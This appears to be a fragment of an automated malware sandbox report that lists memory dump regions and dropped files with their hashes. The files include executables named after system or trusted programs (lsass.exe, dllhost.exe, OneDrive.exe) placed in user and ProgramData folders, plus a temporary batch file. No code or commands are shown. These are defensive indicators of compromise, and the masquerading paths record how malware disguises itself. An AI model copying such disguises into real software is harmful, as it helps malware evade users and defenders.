SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1396-239-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

memory/1396-241-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

memory/1396-240-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4684-252-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1396-253-0x000002236D6B0000-0x000002236D6C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4324-257-0x00007FF6A6840000-0x00007FF6A720A000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3656-269-0x0000000000880000-0x0000000000CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5b92b3663e1cc4a44519b264db471a86
SHA1 b95484c65feac2815b5faf92cce71095616cad4c
SHA256 0658ce65a6ce885d5344ccf7bfade5a054e814eec5299820dfc65164c1aed79c
SHA512 5f5ce39a3c7059b8286c3370be2696896100fb18e99efd7394c8f52244716796580e724d8fa7533db3459ed4f4cda2c48a0fe7c39d5068497e92f3b8bc74211e

memory/3656-280-0x0000000000880000-0x0000000000CA0000-memory.dmp

memory/3656-281-0x0000000000880000-0x0000000000CA0000-memory.dmp

memory/3656-282-0x0000000006BB0000-0x0000000007154000-memory.dmp

memory/3656-283-0x00000000066A0000-0x0000000006732000-memory.dmp

memory/1716-284-0x0000012B62860000-0x0000012B62870000-memory.dmp

memory/1716-286-0x0000012B62860000-0x0000012B62870000-memory.dmp

memory/1716-285-0x0000012B62860000-0x0000012B62870000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1440-293-0x0000020B947E0000-0x0000020B94800000-memory.dmp

memory/3476-292-0x00007FF7D5CC0000-0x00007FF7D668A000-memory.dmp

memory/1776-306-0x000000000A9E0000-0x000000000AA56000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3656-309-0x0000000000880000-0x0000000000CA0000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/1908-311-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1908-312-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1908-313-0x0000000000070000-0x0000000000490000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2A47.tmp.bat

MD5 fff3921b13502256086dd07b3ec594c7
SHA1 c172a54063a5240a05e1543e13975da394c2438a
SHA256 39c76c1af74aaae62266444e872bc9a3cebb264754078827707d7e0a807c8b14
SHA512 5403e43a4190b5eee1bef5541a3d51ab51650a89c04453990251af54d268cfbe79d033d8528351b2cb89b9e04470c34320565907ae6f3ff8fff56cc8380ae396

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35146d80e3801d385baf79d8e05c7fdd
SHA1 101d15d4b4f72e311fd46e806204661186315539
SHA256 ea990fbce8d16e01984d24eb8033dd3d7554aa0a1f92162de237d363a598e3fe
SHA512 d25e95ebea1b6d07731f38c694a441d60c725361a89dd325aeeb8440faaa27a330e073159e13d441f093d967f806f61e3ab938fbe4df77913e3ee0a9f01d7998

memory/1440-317-0x0000020B96290000-0x0000020B962D0000-memory.dmp

memory/1776-318-0x000000000C810000-0x000000000C860000-memory.dmp

memory/1908-319-0x00000000062B0000-0x00000000062BA000-memory.dmp

memory/4684-320-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1776-321-0x000000000C030000-0x000000000C1F2000-memory.dmp

memory/1776-322-0x000000000C860000-0x000000000CD8C000-memory.dmp

memory/4720-323-0x00007FF633810000-0x00007FF633839000-memory.dmp

memory/1440-325-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-326-0x0000000000070000-0x0000000000490000-memory.dmp

memory/4720-328-0x00007FF633810000-0x00007FF633839000-memory.dmp

memory/1440-329-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-330-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-333-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-334-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-336-0x0000020B96310000-0x0000020B96330000-memory.dmp

memory/1440-338-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-339-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-341-0x0000020B96310000-0x0000020B96330000-memory.dmp

memory/1440-343-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp

memory/1908-344-0x0000000000070000-0x0000000000490000-memory.dmp

memory/1440-347-0x00007FF6DCC30000-0x00007FF6DD41F000-memory.dmp